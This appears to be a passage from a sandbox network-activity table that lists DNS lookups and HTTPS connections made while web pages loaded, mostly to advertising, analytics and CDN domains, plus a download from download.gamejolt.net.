| US | 8.8.8.8:53 | tag.1rx.io | udp |
| US | 8.8.8.8:53 | iad-2-apex.go.sonobi.com | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | tag.1rx.io | udp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| US | 34.149.20.76:443 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | e9957.b.akamaiedge.net | udp |
| NL | 46.228.174.115:443 | tag.1rx.io | tcp |
| US | 8.8.8.8:53 | bidder.nl3.vip.prod.criteo.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 8.8.8.8:53 | e9957.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | bidder.nl3.vip.prod.criteo.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 35.227.252.103:443 | rtb.openx.net | udp |
| NL | 46.228.174.115:443 | tag.1rx.io | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | linode-api.eu-west.proximic.com | udp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | e4536.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | d1jvc9b8z3vcjs.cloudfront.net | udp |
| US | 8.8.8.8:53 | linode-api.eu-west.proximic.com | udp |
| US | 8.8.8.8:53 | 155.36.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.217.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.63.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.20.149.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.108.125.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.252.227.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.64.124.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.187.196.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e4536.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | d1jvc9b8z3vcjs.cloudfront.net | udp |
| US | 8.8.8.8:53 | eb.proper.io | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| GB | 108.156.46.103:443 | eb.proper.io | tcp |
| US | 8.8.8.8:53 | eb.proper.io | udp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | eb.proper.io | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | euw-ice.360yield.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | euw-ice.360yield.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| DE | 51.75.86.98:443 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | static.nl3.vip.prod.criteo.net | udp |
| US | 8.8.8.8:53 | a1d05cb01e45e6e5d0f6599a17b43eac.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | static.nl3.vip.prod.criteo.net | udp |
| GB | 172.217.169.65:443 | a1d05cb01e45e6e5d0f6599a17b43eac.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | pagead-googlehosted.l.google.com | udp |
| US | 8.8.8.8:53 | pagead-googlehosted.l.google.com | udp |
| GB | 172.217.169.65:443 | pagead-googlehosted.l.google.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | 232.154.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.46.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.86.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.224.220.67.in-addr.arpa | udp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| IE | 54.154.21.218:443 | euw-ice.360yield.com | tcp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | tcp |
| NL | 178.250.1.3:443 | static.nl3.vip.prod.criteo.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| NL | 178.250.1.3:443 | static.nl3.vip.prod.criteo.net | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | gum.nl3.vip.prod.criteo.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | gum.nl3.vip.prod.criteo.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | gbc4.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | gbc2.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | gbc2.nl3.eu.criteo.com | udp |
| FR | 185.235.86.119:443 | gbc4.fr3.eu.criteo.com | tcp |
| NL | 185.235.87.83:443 | gbc2.nl3.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.21.154.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| US | 52.32.42.129:443 | bids.proper.io | tcp |
| US | 8.8.8.8:53 | 119.86.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.87.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.enthusiastgaming.net | udp |
| GB | 18.244.179.40:443 | api.enthusiastgaming.net | tcp |
| US | 8.8.8.8:53 | api.enthusiastgaming.net | udp |
| US | 8.8.8.8:53 | api.enthusiastgaming.net | udp |
| US | 8.8.8.8:53 | vplayer.enthusiastgaming.com | udp |
| GB | 13.224.222.122:443 | vplayer.enthusiastgaming.com | tcp |
| US | 8.8.8.8:53 | d25rcu0ocutfu6.cloudfront.net | udp |
| US | 8.8.8.8:53 | d25rcu0ocutfu6.cloudfront.net | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| NL | 46.228.174.115:443 | tag.1rx.io | tcp |
| GB | 13.224.222.122:443 | d25rcu0ocutfu6.cloudfront.net | udp |
| US | 69.166.1.9:443 | iad-2-apex.go.sonobi.com | tcp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | targeting.unrulymedia.com | udp |
| US | 8.8.8.8:53 | ced.sascdn.com | udp |
| US | 8.8.8.8:53 | cmp.inmobi.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | a1184.b.akamai.net | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| FR | 99.86.91.98:443 | tagan.adlightning.com | tcp |
| US | 8.8.8.8:53 | 40.179.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.222.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pghub.io | udp |
| US | 8.8.8.8:53 | a1184.b.akamai.net | udp |
| US | 35.241.45.217:443 | pghub.io | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | d23sp3kzv1t6m5.cloudfront.net | udp |
| US | 8.8.8.8:53 | tagan.adlightning.com | udp |
| US | 8.8.8.8:53 | pghub.io | udp |
| US | 8.8.8.8:53 | tagan.adlightning.com | udp |
| US | 8.8.8.8:53 | pghub.io | udp |
| US | 35.241.45.217:443 | pghub.io | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | 216.75.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.91.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.45.241.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | propermedia-d.openx.net | udp |
| US | 35.244.159.8:443 | propermedia-d.openx.net | tcp |
| US | 8.8.8.8:53 | propermedia-d.openx.net | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | eu-eb2.3lift.com | udp |
| SE | 23.34.232.182:443 | acdn.adnxs.com | tcp |
| US | 8.8.8.8:53 | e6115.g.akamaiedge.net | udp |
| SE | 23.34.232.193:443 | ads.pubmatic.com | tcp |
| BE | 23.55.98.169:443 | eus.rubiconproject.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| BE | 23.14.90.90:443 | a1184.b.akamai.net | tcp |
| GB | 18.244.114.102:443 | cmp.inmobi.com | tcp |
| FR | 13.249.9.34:443 | sb.scorecardresearch.com | tcp |
| US | 8.8.8.8:53 | propermedia-d.openx.net | udp |
| US | 8.8.8.8:53 | eu-eb2.3lift.com | udp |
| US | 8.8.8.8:53 | e6115.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 35.244.159.8:443 | propermedia-d.openx.net | udp |
| US | 8.8.8.8:53 | e8960.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | e8960.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.net.akadns.net | tcp |
| DE | 23.53.40.113:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.111.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.98.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.232.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.114.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.40.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | hblg.media.net | udp |
| US | 8.8.8.8:53 | r2---sn-5hne6nz6.gvt1.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | qsearch-a.akamaihd.net | udp |
| US | 8.8.8.8:53 | warp.media.net | udp |
| US | 8.8.8.8:53 | sync.teads.tv | udp |
| US | 8.8.8.8:53 | de.tynt.com | udp |
| US | 8.8.8.8:53 | proc.ad.cpe.dotomi.com | udp |
| NL | 74.125.100.199:443 | r2---sn-5hne6nz6.gvt1.com | tcp |
| US | 8.8.8.8:53 | r2.sn-5hne6nz6.gvt1.com | udp |
| BE | 23.14.90.82:443 | qsearch-a.akamaihd.net | tcp |
| US | 8.8.8.8:53 | a267.g.akamai.net | udp |
| US | 67.202.105.32:443 | de.tynt.com | tcp |
| US | 67.202.105.32:443 | de.tynt.com | tcp |
| US | 8.8.8.8:53 | de.tynt.com | udp |
| BE | 23.55.96.24:443 | contextual.media.net | tcp |
| SE | 23.34.232.19:443 | warp.media.net | tcp |
| NL | 89.207.16.146:443 | proc.ad.cpe.dotomi.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r2.sn-5hne6nz6.gvt1.com | udp |
| BE | 23.55.97.75:443 | sync.teads.tv | tcp |
| US | 8.8.8.8:53 | de.tynt.com | udp |
| US | 8.8.8.8:53 | ce.lijit.com | udp |
| US | 8.8.8.8:53 | a267.g.akamai.net | udp |
| US | 8.8.8.8:53 | hblg.media.net | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| IE | 108.128.26.74:443 | ce.lijit.com | tcp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | warp.media.net | udp |
| US | 8.8.8.8:53 | hblg.media.net | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | warp.media.net | udp |
| US | 8.8.8.8:53 | convex-rr.global.dual.dotomi.weighted.com.akadns.net | udp |
| US | 8.8.8.8:53 | e9957.e4.akamaiedge.net | udp |
| NL | 74.125.100.199:443 | r2.sn-5hne6nz6.gvt1.com | udp |
| US | 8.8.8.8:53 | raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | convex-rr.global.dual.dotomi.weighted.com.akadns.net | udp |
| US | 8.8.8.8:53 | e9957.e4.akamaiedge.net | udp |
| US | 8.8.8.8:53 | raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com | udp |
| SE | 23.34.232.19:443 | warp.media.net | tcp |
| SE | 23.34.232.19:443 | warp.media.net | tcp |
| BE | 23.55.96.24:443 | contextual.media.net | udp |
| US | 8.8.8.8:53 | 199.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.96.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.232.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.105.202.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.26.128.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lg3.media.net | udp |
| SE | 23.34.232.19:443 | lg3.media.net | tcp |
| US | 8.8.8.8:53 | lg3.media.net | udp |
| SE | 23.34.232.19:443 | lg3.media.net | udp |
| US | 8.8.8.8:53 | lg3.media.net | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats-dev.brid.tv | udp |
| US | 8.8.8.8:53 | vcdn.enthusiastgaming.com | udp |
| GB | 13.224.245.93:443 | stats-dev.brid.tv | tcp |
| US | 8.8.8.8:53 | stats-dev.brid.tv | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 18.165.227.125:443 | vcdn.enthusiastgaming.com | tcp |
| GB | 18.165.227.125:443 | vcdn.enthusiastgaming.com | tcp |
| US | 8.8.8.8:53 | d23ty8mdmlmsvp.cloudfront.net | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | d23ty8mdmlmsvp.cloudfront.net | udp |
| GB | 13.224.245.93:443 | stats-dev.brid.tv | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | 93.245.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.227.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.gamejolt.net | udp |
| US | 8.8.8.8:53 | download.gamejolt.net | udp |
| US | 104.18.15.32:443 | download.gamejolt.net | tcp |
| US | 8.8.8.8:53 | download.gamejolt.net | udp |
| US | 104.18.15.32:443 | download.gamejolt.net | udp |
| US | 8.8.8.8:53 | 32.15.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pb-stats.brid.tv | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 8.8.8.8:53 | prebid-server.rubiconproject.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| GB | 216.137.44.4:443 | pb-stats.brid.tv | tcp |
| NL | 69.173.156.150:443 | prebid-server.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | pb-stats.brid.tv | udp |
| DE | 52.59.140.176:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | prebid-server-perf-eu.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | pb-stats.brid.tv | udp |
| US | 8.8.8.8:53 | prebid-server-perf-eu.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | 150.156.173.69.in-addr.arpa | udp |
| GB | 216.137.44.4:443 | pb-stats.brid.tv | tcp |
| US | 8.8.8.8:53 | lexicon.33across.com | udp |
| US | 8.8.8.8:53 | lexicon.33across.com | udp |
| US | 8.8.8.8:53 | lexicon.33across.com | udp |
| US | 8.8.8.8:53 | 176.140.59.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.44.137.216.in-addr.arpa | udp |
| US | 35.244.193.51:443 | lexicon.33across.com | tcp |
| US | 35.244.193.51:443 | lexicon.33across.com | udp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | eu-eb2.3lift.com | udp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | ds-pr-bh.ybp.gysm.yahoodns.net | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| GB | 108.156.39.69:443 | s.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eu-eb2.3lift.com | udp |
| US | 8.8.8.8:53 | imagsync-lhrpairbc.pubmatic.com | udp |
| US | 8.8.8.8:53 | imagsync-lhrpairbc.pubmatic.com | udp |
| IE | 54.217.40.10:443 | ds-pr-bh.ybp.gysm.yahoodns.net | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| GB | 185.64.191.214:443 | imagsync-lhrpairbc.pubmatic.com | tcp |
| GB | 108.156.39.69:443 | s.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.com | udp |
| US | 8.8.8.8:53 | pixel-origin.mathtag.com | udp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | pixel-origin.mathtag.com | udp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| US | 8.8.8.8:53 | dorpat.geo.iponweb.net | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 214.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.40.217.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | ds-pr-bh.ybp.gysm.yahoodns.net | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| AU | 172.217.167.99:443 | csi.gstatic.com | tcp |
| NL | 35.214.199.88:443 | dorpat.geo.iponweb.net | tcp |
| US | 216.200.232.253:443 | pixel-origin.mathtag.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | udp |
| FR | 154.54.250.80:443 | ads.stickyadstv.com | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| FR | 5.196.111.69:443 | ssbsync-global.smartadserver.com | tcp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | eu-west-dual.ads.stickyadstv.com.akadns.net | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | eu-west-dual.ads.stickyadstv.com.akadns.net | udp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| DE | 18.158.126.136:443 | match.sharethrough.com | tcp |
| AU | 172.217.167.99:443 | csi.gstatic.com | tcp |
| NL | 35.214.199.88:443 | dorpat.geo.iponweb.net | tcp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | outspot2-ams.adx.opera.com | udp |
| US | 8.8.8.8:53 | outspot2-ams.adx.opera.com | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 8.8.8.8:53 | ssbsync-euw2.smartadserver.com | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| DE | 18.158.126.136:443 | match.sharethrough.com | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | dorpat.geo.iponweb.net | udp |
| US | 8.8.8.8:53 | match-eu-central-1-ecs.sharethrough.com | udp |
| US | 104.22.51.98:443 | spl.zeotap.com | tcp |
| US | 8.8.8.8:53 | 69.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.250.54.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.111.196.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.143.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.232.200.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.126.158.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.199.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 8.8.8.8:53 | match-eu-central-1-ecs.sharethrough.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 104.22.51.98:443 | spl.zeotap.com | tcp |
| NL | 35.214.199.88:443 | dorpat.geo.iponweb.net | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | m.media-amazon.com | udp |
| GB | 142.250.180.2:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | a1994.dscr.akamai.net | udp |
| BE | 23.14.90.105:443 | a1994.dscr.akamai.net | tcp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | 98.51.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1994.dscr.akamai.net | udp |
| BE | 23.14.90.105:443 | a1994.dscr.akamai.net | udp |
| GB | 142.250.180.2:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | ts.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | images-na.ssl-images-amazon.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 18.245.218.37:443 | ts.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | d21t3ooy68jlh9.cloudfront.net | udp |
| GB | 18.245.154.202:443 | images-na.ssl-images-amazon.com | tcp |
| US | 8.8.8.8:53 | c.media-amazon.com | udp |
| US | 8.8.8.8:53 | d21t3ooy68jlh9.cloudfront.net | udp |
| GB | 18.245.154.202:443 | images-na.ssl-images-amazon.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | s2.paa-reporting-advertising.amazon | udp |
| US | 8.8.8.8:53 | 37.218.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.87.77.80.in-addr.arpa | udp |
| GB | 54.192.137.6:443 | s2.paa-reporting-advertising.amazon | tcp |
